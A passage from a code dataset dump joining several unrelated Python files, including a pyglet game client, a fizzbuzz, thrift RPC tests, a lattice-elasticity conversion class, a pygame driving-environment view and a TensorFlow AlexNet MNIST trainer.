pyglet.graphics.Batch()\n####CHARACTER LOADING\nPLAYERS = {} # this global dictionary will own the players once they join.\nMYSELF = None\nkey_states = {\"UP\": False, \"DOWN\": False,\n \"LEFT\": False, \"RIGHT\": False,\n \"name\": NAME}\n\n\ndef update():\n from client import TRANSPORT\n if TRANSPORT:\n key_states.update(client=NAME)\n TRANSPORT.sendto(json.dumps(key_states).encode(), ADDR)\n LOOP.call_later(0.005, update)\n for p in PROJECTILES.values():\n p.update()\n\n\n@window.event\ndef on_mouse_press(x, y, button, modifiers):\n v = Vec2d(x - window.width / 2, y - window.height / 2) + MYSELF.body.position + Vec2d(16, 16)\n from client import TRANSPORT\n if TRANSPORT:\n click_state = {\"click\": [v.x, v.y]}\n click_state.update(key_states)\n TRANSPORT.sendto(json.dumps(click_state).encode(), ADDR)\n\n\n@window.event\ndef on_key_press(symbol, modifiers):\n if symbol == key.UP:\n key_states[\"UP\"] = True\n elif symbol == key.DOWN:\n key_states[\"DOWN\"] = True\n elif symbol == key.LEFT:\n key_states[\"LEFT\"] = True\n elif symbol == key.RIGHT:\n key_states[\"RIGHT\"] = True\n\n\n@window.event\ndef on_key_release(symbol, modifiers):\n if symbol == key.UP:\n key_states[\"UP\"] = False\n elif symbol == key.DOWN:\n key_states[\"DOWN\"] = False\n elif symbol == key.LEFT:\n key_states[\"LEFT\"] = False\n elif symbol == key.RIGHT:\n key_states[\"RIGHT\"] = False\n\n\n@window.event\ndef on_draw():\n gl.glPushMatrix()\n if MYSELF:\n gl.glTranslatef(-MYSELF.body.position.x + window.width / 2,\n -MYSELF.body.position.y + window.height / 2, 0)\n map_batch.draw()\n for c in PLAYERS.values():\n c.draw()\n for p in PROJECTILES.values():\n p.draw()\n gl.glPopMatrix()\n gl.glFinish()\n\n\ndef data_received(byte_data):\n data = json.loads(byte_data)\n if data[\"type\"] == \"player\":\n pid = data[\"id\"]\n if pid not in PLAYERS.keys():\n print(\"player {} added\".format(data['name']))\n PLAYERS[pid] = Player(id=data[\"id\"], name=data['name'], batch=character_batch)\n if PLAYERS[pid].name == str(NAME):\n # FIXME: This isn't happening correctly.\n print(\"found myself\")\n global MYSELF\n MYSELF = PLAYERS[pid]\n PLAYERS[pid].read_datagram(data)\n elif data[\"type\"] == \"projectile\":\n pid = data[\"id\"]\n if pid not in PROJECTILES:\n PROJECTILES[pid] = Projectile(data[\"position\"], Vec2d(0, 0), id=key)\n PROJECTILES[pid].read_datagram(data)\n\nLOOP = asyncio.get_event_loop()\nLOOP.call_later(0.005, update)\nmusic = pyglet.resource.media('sound/dst-1990.mp3')\nmusic.play()\nstart_client(data_received_callback=data_received)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"209777347","text":"def fizz_buzz(this_number):\n for i in range(this_number):\n if i%3 == 0 and i%5 == 0:\n print ('fizzbuzz')\n elif i%3 == 0:\n print('fizz')\n elif i%5 == 0:\n print('buzz')\n else: print(i)\n\nfizz_buzz(20)","sub_path":"fizz_buzz.py","file_name":"fizz_buzz.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"553882595","text":"''' This scripts tests reading a path planning .pth file.\n'''\nimport os\nfrom pathlib import Path\nimport sv\nimport sys\nimport vtk\n\n## Set some directory paths. \nscript_path = Path(os.path.realpath(__file__)).parent\nparent_path = Path(os.path.realpath(__file__)).parent.parent\ndata_path = parent_path / 'data'\n\ntry:\n sys.path.insert(1, str(parent_path / 'graphics'))\n import graphics as gr\nexcept:\n print(\"Can't find the new-api-tests/graphics package.\")\n\n## Create a Paths object from an SV file.\n#\nhome = str(Path.home())\npath_name = \"aorta\"\nfile_name = str(data_path / 'DemoProject' / 'Paths' / (path_name + \".pth\"))\npaths = sv.pathplanning.Series(file_name)\nprint(\"Paths:\")\nprint(\" Number of time steps: {0:d}\".format(paths.get_num_times()))\nprint(\" Name: {0:s}\".format(paths.get_name()))\n\nprint(\" \")\nprint(\"Path at time 0:\")\naorta_path = paths.get_path(0)\ncontrol_points = aorta_path.get_control_points()\nprint(\" Number of control points: {0:d}\".format(len(control_points)))\ncurve_points = aorta_path.get_curve_points()\nprint(\" Number of curve points: {0:d}\".format(len(curve_points)))\n#\npoint = aorta_path.get_curve_point(20)\nprint(\" Point 20: {0:s}\".format(str(point)))\ntangent = aorta_path.get_curve_tangent(20)\nprint(\" Tangent 20: {0:s}\".format(str(tangent)))\nnormal = aorta_path.get_curve_normal(20)\nprint(\" Normal 20: {0:s}\".format(str(normal)))\n#\nnum_subdiv = aorta_path.get_num_subdivisions()\nprint(\" Number of subdivisions: {0:d}\".format(num_subdiv))\nsubdiv_method = aorta_path.get_subdivision_method()\nprint(\" Subdivision method: {0:s}\".format(subdiv_method))\n\n## Create renderer and graphics window.\nwin_width = 500\nwin_height = 500\nrenderer, renderer_window = gr.init_graphics(win_width, win_height)\n\n# Create path geometry.\ngr.create_path_geometry(renderer, aorta_path)\n#gr.create_path_geometry(renderer, aorta_path, show_points=True)\n\n# Display window.\ngr.display(renderer_window)\n\n\n","sub_path":"new-api-tests/pathplanning/read-paths-file.py","file_name":"read-paths-file.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"44976435","text":"# Copyright (c) 2016 Uber Technologies, Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom __future__ import (\n absolute_import, division, print_function, unicode_literals\n)\n\nimport pytest\nfrom tchannel import thrift as tch_thrift\n\nfrom yarpc import Request, Response\nfrom yarpc.encoding import thrift\n\n# TODO add all the test cases from tchannel/schemes/test_thrift.py\n\nidl = 'tests/data/idls/ThriftTest.thrift'\n\n\n@pytest.fixture\ndef service():\n return thrift.load(idl)\n\n\n@pytest.fixture(autouse=True)\ndef testString(rpc, service):\n\n @thrift.procedure(service.ThriftTest)\n def testString(request):\n assert request.service == 'test-service'\n assert request.encoding == 'thrift'\n assert request.procedure == 'ThriftTest::testString'\n assert request.body.thing == 'howdy'\n return Response(\n body=request.body.thing,\n headers=request.headers,\n )\n\n rpc.register(testString)\n return testString\n\n\n@pytest.fixture\ndef client(rpc):\n return thrift.ThriftClient(rpc.channel('test-service'))\n\n\n@pytest.mark.gen_test\ndef test_should_call_procedure(client, service):\n req = Request(\n body=service.ThriftTest.testString('howdy'),\n ttl=10000,\n )\n\n resp = yield client.call(req)\n assert isinstance(resp, Response)\n assert resp.body == 'howdy'\n\n\n@pytest.mark.gen_test\ndef test_can_call_handler(testString, service):\n req = Request(\n service='test-service',\n encoding='thrift',\n procedure='ThriftTest::testString',\n body=service.ThriftTest.testString('howdy'),\n ttl=10000,\n )\n\n resp = testString(req)\n assert isinstance(resp, Response)\n assert resp.body == 'howdy'\n\n\n@pytest.mark.xfail\n@pytest.mark.gen_test\ndef test_should_call_procedure_with_kwargs(client, service):\n resp = yield client.call(\n body=service.ThriftTest.testString('howdy'),\n ttl=10000,\n )\n assert isinstance(resp, Response)\n assert resp.body == 'howdy'\n\n\n@pytest.mark.gen_test\ndef test_should_roundtrip_headers(client, service):\n headers = {\n 'hello': 'world',\n 'mynameis': 'bob',\n }\n req = Request(\n body=service.ThriftTest.testString('howdy'),\n headers=headers,\n ttl=10000,\n )\n resp = yield client.call(req)\n assert headers == resp.headers\n\n\n##############################################################################\n# TODO: The following tests just assert things about the load() function. We\n# should move them to a separate file once we break yarpc.encoding.thrift into\n# submodules.\n\n\ndef test_service_methods_should_return_body(service):\n body = service.ThriftTest.testString(thing='hi')\n assert body.thing == 'hi'\n\n\ndef test_types_should_be_attached(service):\n bonk = service.Bonk(\n message='hi',\n type=100,\n )\n assert bonk.to_primitive() == {\n 'message': 'hi',\n 'type': 100,\n }\n\n\ndef test_constants_should_be_attached(service):\n assert service.myNumberz == 1\n\n\ndef test_req_body_is_wire_compat_with_tchannel(service):\n args = {\n 'string_thing': 'hi',\n 'byte_thing': 1,\n 'i32_thing': -1,\n 'i64_thing': -34359738368,\n }\n\n # serialize object using yarpc's thrift.load\n xtruct = service.Xtruct(**args)\n req_body = service.ThriftTest.testStruct(xtruct)\n wire = req_body.__thrift_module__.dumps(req_body) # non-enveloped\n\n # now serialize using tchannel's thrift.load\n tch_service = tch_thrift.load(idl, service='...', hostport='...')\n tch_xtruct = tch_service.Xtruct(**args)\n tch_req_body = tch_service.ThriftTest.testStruct(tch_xtruct)\n tch_serializer = tch_req_body.get_serializer()\n tch_wire = tch_serializer.serialize_body(tch_req_body.call_args)\n\n assert wire == tch_wire\n","sub_path":"tests/yarpc/encoding/test_thrift.py","file_name":"test_thrift.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41126569","text":"\nimport yaml\nimport sys\n\"\"\"\nEric Fournier 2019-06-17\nRetourne le SnakeMake pipeline a executer selon la colonne Pipeline du SampleSheet.csv\n\"\"\"\n\n#Le fichier mapping yaml pour la correspondance entre le pipeline indique dans la colonne Pipeline du SampleSheet et le nom pipeline a executer\nsnakemake_param = sys.argv[1]\n\n#Le sample sheet simplifie de la run\nsample_sheet = sys.argv[2]\n\nsample_sheet_handle = open(sample_sheet)\nheader = sample_sheet_handle.readline()\n#le nom du pipeline dans le sample sheet\npipeline_from_samplesheet = sample_sheet_handle.readline().split(',')[10]\nsample_sheet_handle.close()\n\nsnakemake_param_handle = open(snakemake_param)\nsnakemake_pipeline_map_dict = yaml.load(snakemake_param_handle)\n#print snakemake_pipeline_map_dict\n#le nom du pipeline a executer\npipeline = snakemake_pipeline_map_dict[pipeline_from_samplesheet]\nsnakemake_param_handle.close()\n\nexit(pipeline)\n","sub_path":"GetSnakeMakePipeline.py","file_name":"GetSnakeMakePipeline.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"90782725","text":"import numpy as np\nfrom scipy.optimize import newton\n\nclass SimulToAnalytic:\n def __init__(self,k=1,kA=0,kc=0.001,J=0,epsilon=0.001,writting=True,ParticleType='Triangle'):\n self.k,self.kA,self.kc,self.J,self.epsilon,self.ParticleType = k,kA,kc,J,epsilon,ParticleType #store the constant\n self.nu=(np.sqrt(3)*self.k+2*self.kA)/(3*np.sqrt(3)*self.k+2*self.kA) # Poisson's ratop\n if ParticleType=='Triangle':\n self.l0 = 1+self.epsilon\n self.la=np.sqrt(3)/2*self.k+self.kA # lambda lame coef\n self.mu=np.sqrt(3)/2*self.k # mu lame coef\n self.kcouplingc=self.kc/self.l0**2*4*np.sqrt(3) # coupling parameter\n elif ParticleType=='Hexagon':\n self.la = np.sqrt(3)/4*k+0.5*kA\n self.mu = np.sqrt(3)/4*k\n self.l0 =1.\n self.kcouplingc = np.sqrt(3)*kc/(1-epsilon**2)\n self.LMu=self.la+2*self.mu # lambda+2mu\n self.l=np.sqrt((self.la+2*self.mu)/(2*self.kcouplingc)) # depth length\n self.fb=0.5*(self.LMu)*(1+self.nu)*(2*self.epsilon/(1+self.epsilon))**2 # bulk free energy per area\n if self.ParticleType == 'Triangle':\n self.FB=self.fb*np.sqrt(3)/4 * (1+self.epsilon)**2#Bulk free energy per particle\n self.Gamma=2*self.J/(self.l*self.l0*self.fb*(1+self.nu)) # rescaled surface tension\n elif self.ParticleType == 'Hexagon':\n self.FB = self.fb*np.sqrt(3)/2*(1+self.epsilon)**2\n #self.FB = self.fb * 3*np.sqrt(3)/2*(1./3.+epsilon**2)\n self.Gamma=2*self.J/(self.l*(1+self.nu)*self.fb*(1/3+epsilon**2)**0.5)\n if writting:\n print('nu='+str(self.nu))\n print('lambda='+str(self.la))\n print('mu='+str(self.mu))\n print('kcoupling_continuous='+str(self.kcouplingc))\n print('l='+str(self.l))\n print('volumique bulk free energy fb='+str(self.fb))\n print('free energy per particle FB='+str(self.FB))\n print('Gamma='+str(self.Gamma))\n print('ParticleType = '+str(self.ParticleType))\n def Range(self,Nmax):\n if self.ParticleType == 'Triangle':\n #Size = int(4*(Nmax/6)**0.5+0.5)\n #dirty disk\n #Size = int(4*np.sqrt(Nmax/np.pi*0.433))+2\n #return np.arange(4,Size,4)\n #clean disk\n Size = self.Size(Nmax)\n return np.arange(1,Size,1)\n elif self.ParticleType == 'Hexagon':\n #Size = int(0.5* (1+np.sqrt(1+8*Nmax)))\n #return np.arange(1,Size,1)\n def NFunc(R):\n return (R/2-R**(1./3.))**2-Nmax\n Size = int(newton(NFunc,20))\n return np.arange(4,Size,2)\n def Size(self,N):\n if self.ParticleType == 'Triangle':\n #clean disk\n return 0.5 * ( (N/(3**0.5*np.pi))**0.5-1.5)\n #dirty disk\n #return max(int(4*np.sqrt(N/np.pi*0.433))+2,1)\n elif self.ParticleType== 'Hexagon' :\n def NFunc(R):\n return (R/2-R**(1./3.))**2-N\n Size = int(newton(NFunc,20))\n return max(Size,1)\n def HRange(self,Nmax):\n if self.ParticleType == 'Triangle':\n Size = int(4*(Nmax/6)**0.5+0.5)\n return np.arange(2,Size,2)\n elif self.ParticleType == 'Hexagon':\n Size = int(1./6.* (3+np.sqrt(3*(4*Nmax-1))))\n return np.arange(1,Size,1)\n def write(self,All=False):\n return np.arange(1,Size,1)\n def HSize(self,N):\n if self.ParticleType == 'Triangle':\n return max(int(4*(N/6)**0.5),1)\n elif self.ParticleType== 'Hexagon' :\n #return max(int(0.5* (1+np.sqrt(1+8*N))),1)\n return max(int(1./6.* (3+np.sqrt(3*(4*N-1)))),1)\nclass AnalyticToSimul:\n def __init__(self,nu=1/3,Gamma=0.,l=1.,epsilon=0.1,writting = True,ParticleType='Triangle'): #here we assumed k = 1\n self.nu,self.Gamma,self.l,self.epsilon,self.ParticleType = nu,Gamma,l,epsilon,ParticleType\n self.k = 1\n self.kA = (3*np.sqrt(3)*self.nu-np.sqrt(3))/(2*(1-self.nu))\n if ParticleType=='Triangle':\n self.l0 = 1+self.epsilon\n self.LMu = 3*np.sqrt(3)/2+self.kA\n self.kc = self.LMu/(8*np.sqrt(3)*(self.l/self.l0)**2)\n elif ParticleType=='Hexagon':\n self.LMu = 3*np.sqrt(3)/4+0.5*self.kA\n self.kc = (1-epsilon**2)*self.LMu/(2*np.sqrt(3)*self.l**2)\n self.l0 = 1.#+self.epsilon\n self.fb = 0.5*self.LMu*(1+self.nu)*(2*self.epsilon/(1+self.epsilon))**2\n if ParticleType=='Triangle':\n self.FB = self.fb*np.sqrt(3)/4 * self.l0**2#Bulk free energy per particle\n self.J = self.l*self.fb*(1+self.nu)*self.Gamma/2*self.l0\n self.Flacune = np.inf\n elif ParticleType=='Hexagon':\n #self.FB = self.fb* np.sqrt(3)*3/2*(1./3.+self.epsilon**2)\n self.FB = self.fb*np.sqrt(3)/2*(1+self.epsilon)**2\n self.J = self.Gamma*(self.l*(1+self.nu)*self.fb*(1/3+epsilon**2))/2\n self.Flacune = 3*(1/3+self.epsilon**2)*self.fb*self.l*(1+self.nu)/2*self.Gamma\n if writting :\n print('k='+str(self.k))\n print('kA='+str(self.kA))\n print('kc='+str(self.kc))\n print('J='+str(self.J))\n print('fb='+str(self.fb))\n print('ParticleType = '+str(self.ParticleType))\n def Range(self,Nmax):\n if self.ParticleType == 'Triangle':\n #Size = int(4*(Nmax/6)**0.5+0.5)\n #dirty disk\n #Size = int(4*np.sqrt(Nmax/np.pi*0.433))+2\n #return np.arange(4,Size,4)\n #clean disk\n Size = self.Size(Nmax)\n return np.arange(1,Size,1)\n elif self.ParticleType == 'Hexagon':\n #Size = int(0.5* (1+np.sqrt(1+8*Nmax)))\n #return np.arange(1,Size,1)\n def NFunc(R):\n return (R/2-R**(1./3.))**2-Nmax\n Size = int(newton(NFunc,20))\n return np.arange(4,Size,2)\n def Size(self,N):\n if self.ParticleType == 'Triangle':\n #clean disk\n #print(0.5 * ( (N/(3**0.5*np.pi))**0.5-1.5))\n return max(1,int(0.5 * ( (N/(3**0.5*np.pi))**0.5-1.5)+0.5))\n #dirty disk\n #return max(int(4*np.sqrt(N/np.pi*0.433))+2,1)\n elif self.ParticleType== 'Hexagon' :\n def NFunc(R):\n return (R/2-R**(1./3.))**2-N\n Size = int(newton(NFunc,20))\n return max(Size,1)\n def HRange(self,Nmax):\n if self.ParticleType == 'Triangle':\n Size = int(4*(Nmax/6)**0.5+0.5)\n return np.arange(2,Size,2)\n elif self.ParticleType == 'Hexagon':\n Size = int(1./6.* (3+np.sqrt(3*(4*Nmax-1))))\n return np.arange(1,Size+1,1)\n def write(self,All=False):\n return np.arange(1,Size,1)\n def HSize(self,N):\n if self.ParticleType == 'Triangle':\n return max(int(4*(N/6)**0.5),1)\n elif self.ParticleType== 'Hexagon' :\n #return max(int(0.5* (1+np.sqrt(1+8*N))),1)\n return max(int(1./6.* (3+np.sqrt(3*(4*N-1)))),1)\n def write(self,All=False):\n print('k='+str(self.k))\n print('kA='+str(self.kA))\n print('kc='+str(self.kc))\n print('J='+str(self.J))\n print('fb='+str(self.fb))\n print('ParticleType = '+str(self.ParticleType))\n if All :\n print('epsilon='+str(self.epsilon))\n print('nu='+str(self.nu))\n print('Gamma='+str(self.Gamma))\n print('l='+str(self.l))\n","sub_path":"Conversion.py","file_name":"Conversion.py","file_ext":"py","file_size_in_byte":7610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231321449","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport pygame\nimport numpy as np\nfrom variables import global_var\n\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\n\n\nclass View(object):\n\n \"\"\"View handles the visualization part of the environment.\"\"\"\n\n def __init__(self, env_name, env_width, env_height, screen_width=None, screen_height=None, flip=False):\n \"\"\"Initializes View.\n\n Args:\n env_name: The name of the environment image to load.\n env_width: The width of the whole environment.\n env_height: The height of the whole environment.\n screen_width: The width of the screen to view. If None, whole env is displayed.\n screen_height: The height of the screen to view. If None, whole env is displayed.\n flip: Whether to flip the screen. For driving view.\n \"\"\"\n self.flip = flip\n\n # Width of the whole environment.\n self.width = env_width\n self.height = env_height\n\n # Width of the view.\n self.screen_width = screen_width if screen_width is not None else env_width\n self.screen_height = screen_height if screen_height is not None else env_height\n\n # Whether the environment should follow the agent's view or show the whole env.\n self.scroll = self.width != self.screen_width or self.height != self.screen_height\n\n self.surface = None\n self.surface_flipped = None\n self.env_view = None\n\n self.trajectory = None # The trajectory to draw onto the image.\n\n self.env_img = self._load_img(env_name)\n\n self.surface = pygame.Surface((self.screen_width, self.screen_height))\n self.surface_flipped = pygame.Surface((self.screen_width, self.screen_height))\n\n def update(self, x, y, characters):\n \"\"\"Updates the view with all the characters.\n\n Args:\n x: The x coordinate around which to center the view.\n y: The y coordinate around which to center the view.\n characters: A list of tuples of form (img, x, y, theta) for each char.\n\n Returns:\n Surface object.\n \"\"\"\n # Update the current view of the environment.\n self.env_view = self._get_current_view(x, y)\n\n # Draw a trajectory if it exists.\n if self.trajectory is not None:\n self._draw_trajectory()\n\n # Draw the environment onto the image.\n self.surface.blit(self.env_img, (0, 0), self.env_view)\n\n # Draw each character on the image.\n for img, x, y, theta in characters:\n self._draw_character(img, x, y, theta, self.env_view[0], self.env_view[1])\n\n # Flip the image if necessary.\n if self.flip:\n self.surface_flipped = pygame.transform.flip(self.surface, False, True)\n self.surface.blit(self.surface_flipped, (0, 0))\n\n return self.surface\n\n def draw_trajectory(self, trajectory):\n \"\"\"Saves and draws trajectory which is a list of states. The states\n need to be of form (x, y). Call update to see the trajectory. TODO: Add\n theta and make arrows.\"\"\"\n self.trajectory = trajectory\n self._draw_trajectory()\n\n def clear_trajectory(self):\n \"\"\"Clears the trajectory from the view.\"\"\"\n self.trajectory = None\n\n def _draw_trajectory(self):\n \"\"\"Draws the actual trajectory onto the image.\"\"\"\n if self.trajectory is None:\n return\n\n for state in self.trajectory:\n pygame.draw.circle(self.env_img, BLUE, (int(state[0]), int(state[1])), 2)\n\n def get_colour(self, x, y):\n \"\"\"Returns the normalized RGB values of the pixel at x, y.\"\"\"\n if x >= self.width or y >= self.height:\n return (0, 0, 0)\n\n return self.env_img.get_at((int(x), int(y))).normalize()[0:3]\n\n def _load_img(self, name):\n \"\"\"Loads the image from the map directory.\"\"\"\n try:\n img_path = os.path.join(global_var.PATH, \"maps\", name + \".png\")\n env_img = pygame.image.load(img_path)\n except Exception as e:\n print(e)\n print(\"Environment\", name, \"does not exist. Make sure that a PNG image exists\",\n \"under that name in the \\\"maps\\\" folder.\")\n sys.exit()\n\n return env_img\n\n def _draw_character(self, img, x, y, theta, view_x=0, view_y=0):\n \"\"\"Helper function to draw a character on the screen.\n\n Args:\n img: The image of the character object.\n x: The x position of the character.\n y: The y position of the character.\n theta: The character's heading.\n view_x: The x component of the corner of the current view.\n view_y: The y component of the corner of the current view.\n \"\"\"\n # Rotate the image and get its dimensions.\n rotated = pygame.transform.rotate(img, np.degrees(theta))\n rect = rotated.get_rect()\n\n # Calculate the global position of the corner of the car within the map\n x_global = x - rect.width / 2.0\n y_global = y - rect.height / 2.0\n\n # The car should be displayed relative to the current view.\n x = x_global - view_x\n y = y_global - view_y\n\n self.surface.blit(rotated, (int(round(x)), int(round(y))))\n\n def _get_current_view(self, agent_x, agent_y):\n \"\"\"Gets the coordinates of what the current view should be so that the\n view follows the agent.\"\"\"\n # If scroll is False, the current view is always the whole image.\n if not self.scroll:\n return (0, 0, self.width, self.height)\n\n x = agent_x\n y = agent_y\n w = self.screen_width\n h = self.screen_height\n\n # This is the amount by which the current view selection overshoots the\n # actual size of the environment.\n overshoot_x = max(x + w / 2 - self.width, 0) % self.width\n overshoot_y = max(y + h / 2 - self.height, 0) % self.height\n\n # Make sure that the view will be inside the environment.\n corner_x = max(x - w / 2 - overshoot_x, 0)\n corner_y = max(y - h / 2 - overshoot_y, 0)\n\n return (int(round(corner_x)), int(round(corner_y)), w, h)\n\n\nif __name__ == '__main__':\n # Test code for drawing trajectories and moving along them.\n from agent import Agent\n\n display_surface = pygame.display.set_mode((500, 500))\n clock = pygame.time.Clock()\n pygame.display.set_caption('Traffic World')\n\n pygame.init()\n\n view = View(\"two_lanes\", 500, 1500, 500, 500)\n agent = Agent()\n\n trajectory = [(300, 40),\n (300, 45),\n (300, 50),\n (300, 55),\n (300, 60),\n (300, 65),\n (300, 70),\n (300, 75),\n (300, 80),\n (300, 85),\n (300, 90),\n (300, 95),\n (300, 100),\n (300, 105),\n (300, 110),\n (300, 115),\n (300, 120),\n (300, 125),\n (300, 130)]\n\n view.draw_trajectory(trajectory)\n\n for state in trajectory:\n surf = view.update(state[0], state[1], [(agent.img, state[0], state[1], 0)])\n\n display_surface.blit(surf, (0, 0))\n pygame.display.update()\n clock.tick(15)\n\n done = False\n while not done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n pygame.quit()\n","sub_path":"monicars/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":7526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"377268715","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nimport sys\nimport argparse\nfrom models.alexnet import model_fn as alexnet_model_fn\n\nFLAGS = None\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\n\ndef main(unused_argv):\n mnist = tf.contrib.learn.datasets.load_dataset(\"mnist\")\n train_data = mnist.train.images\n train_labels = np.asarray(mnist.train.labels, dtype=np.int32)\n valid_data = mnist.validation.images\n valid_labels = np.asarray(mnist.validation.labels, dtype=np.int32)\n test_data = mnist.test.images\n test_labels = np.asarray(mnist.test.labels, dtype=np.int32)\n\n run_config = tf.estimator.RunConfig()\n # run_config = run_config.replace(save_checkpoints_steps=3000)\n\n alexnet = tf.estimator.Estimator(\n model_fn=alexnet_model_fn,\n model_dir=FLAGS.model_dir,\n params=vars(FLAGS),\n config=run_config\n )\n\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'x': train_data},\n y=train_labels,\n batch_size=FLAGS.batch_size,\n num_epochs=None,\n shuffle=True,\n num_threads=8\n )\n\n valid_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'x': valid_data},\n y=valid_labels,\n num_epochs=1,\n shuffle=False\n )\n\n valid_n_steps = FLAGS.valid_n_steps\n iter_count = 1\n if valid_n_steps > 0:\n iter_count = FLAGS.max_steps / valid_n_steps\n else:\n valid_n_steps = FLAGS.max_steps\n\n for count in range(int(iter_count)):\n alexnet.train(\n input_fn=train_input_fn,\n max_steps=(count+1) * valid_n_steps\n )\n\n eval_valid_result = alexnet.evaluate(input_fn=valid_input_fn, name='validation')\n print('valid eval result: ', eval_valid_result)\n\n test_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'x': test_data},\n y=test_labels,\n num_epochs=1,\n shuffle=False\n )\n\n eval_test_result = alexnet.evaluate(input_fn=test_input_fn, name='test')\n print('test eval result: ', eval_test_result)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--learning_rate',\n type=float,\n default=1e-4,\n help='Initial learning rate.'\n )\n parser.add_argument(\n '--decay_steps',\n type=int,\n default=1000,\n help='Number of steps to run trainer.'\n )\n parser.add_argument(\n '--decay_rate',\n type=int,\n default=0.8,\n help='Number of steps to run trainer.'\n )\n parser.add_argument(\n '--lr_boundaries',\n type=list,\n default=[1000, 3000, 5000, 7000, 9000, 11000, 13000, 15000, 18000],\n help='Learning rate boundaries'\n )\n parser.add_argument(\n '--lr_values',\n type=list,\n default=[1e-3, 1e-4, 1e-5, 1e-6, 1e-7, 1e-8, 1e-9, 1e-10, 1e-11],\n help='learning rate values'\n )\n parser.add_argument(\n '--keep_prob',\n type=float,\n default=0.5,\n help='Dropout keep prob.'\n )\n parser.add_argument(\n '--max_steps',\n type=int,\n default=5000,\n help='Number of steps to run trainer.'\n )\n parser.add_argument(\n '--steps',\n type=int,\n default=None,\n help='Number of steps to run trainer.'\n )\n parser.add_argument(\n '--valid_n_steps',\n type=int,\n default=2000,\n help='Number of steps to run trainer.'\n )\n parser.add_argument(\n '--batch_size',\n type=int,\n default=128,\n help='Batch size. Must divide evenly into the dataset sizes.'\n )\n parser.add_argument(\n '--model_dir',\n type=str,\n default='/data/private/models/lr_1e-4',\n help='Directory to put the model data.'\n )\n\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)","sub_path":"dave/kakaobrain/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"285890626","text":"import pygame, sys\nimport math\nimport random\n\ndef ball_animation():\n global ball_speed_x, ball_speed_y, ball_angle, lives, i, Background_game, player_x, background\n screen.fill(bg_color)\n screen.blit(background_game, (0,0))\n screen.blit(target, (screen_width * i/48, screen_height * 36/40))\n screen.blit(astronaut, (screen_width * 4/6, screen_height / 60 *39))\n target_rect = pygame.Rect(screen_width * i/48, screen_height * 69/72, target.get_width(), 2)\n pygame.draw.ellipse(screen, (0,200,200), ball)\n pygame.draw.rect(screen, (0,0,0), line)\n launcher_copy = pygame.transform.rotate(launcher, -1 * ball_angle)\n screen.blit(launcher_copy, (screen_width / 120 * 27 - int(launcher_copy.get_width() / 4), screen_height / 120 * 95 - int(launcher_copy.get_height() /2)))\n text = font.render(\"Angle \" + \"{:.2f}\".format(-1 * ball_angle), 30, (200,0,0))\n text1 = font.render(\"Velocity \" + \"{:.2f}\".format(ball_velocity), 30, (200,0,0))\n textlives = font.render(\"Lives Left: \" + str(lives), 30, (200,0,0))\n screen.blit(textlives, (screen_width * 6/8, screen_height * 1/12))\n screen.blit(text1, (screen_width/6, screen_height/8))\n screen.blit(text, (screen_width/6, screen_height/12))\n ball.x += ball_speed_x\n ball.y += ball_speed_y\n\n if ball.bottom >= screen_height* 78/80:\n ball_speed_x = 0\n ball_speed_y = 0\n ball.bottom = screen_height / 80 * 64\n ball.left = screen_width / 120 * 30.4\n lives -= 1\n if ball.colliderect(line):\n ball_speed_y = 0\n if ball.colliderect(target_rect):\n ball_speed_x = 0\n ball_speed_y = 0\n while player_x < 700:\n background = pygame.image.load('ChallengeRoom1(Door1Open).jpg')\n completed()\n if ball.colliderect(wall):\n ball_speed_x = 0\n ball_speed_y = 0\n ball.bottom = screen_height / 80 * 64\n ball.left = screen_width / 120 * 30.4\n lives -= 1\n\n\n if ball.right >= screen_width + 20:\n ball_speed_x = 0\n ball_speed_y = 0\n 